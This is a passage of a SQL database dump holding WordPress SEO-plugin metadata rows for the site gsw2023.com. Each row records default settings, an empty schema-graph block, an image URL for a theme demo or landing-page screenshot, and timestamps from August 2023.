(29,562,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-woo-shop.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(30,1163,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-news.jpg\"}]','2023-08-13 02:13:45',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:13:45','2023-08-13 02:13:45'),
(31,1164,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-demos.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(32,689,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-int.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(33,691,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-feat.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(34,695,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-seven-demo.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(35,1165,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/i-w.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(36,700,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/i-op.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(37,706,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/i-testim.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(38,721,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/stars-rating-landing-79x14-1.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(39,730,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/com-ic.png\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(40,835,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/photo-showcase.jpg\"}]','2023-08-13 02:15:34',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:15:34','2023-08-13 02:15:34'),
(41,837,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/design-showcase.jpg\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(42,841,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/window-showcase.jpg\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(43,844,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/vr-showcase.jpg\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(44,883,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/landing-headers.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(45,885,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/landing-el.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(46,888,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/landing-ecom.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(47,893,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/land-lan-trans.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(48,895,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/land-plug-inc.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(49,897,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/land-7-rev.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(50,901,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/landing-seo-google.png\"}]','2023-08-13 02:16:41',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:16:41','2023-08-13 02:16:41'),
(51,903,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/land-reg-upd.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(52,905,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/landing-support.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(53,920,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/stars-rating.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(54,924,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/the7-rating-rev.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(55,969,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/steps-wiz-land.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(56,973,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/2-l-tiny.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
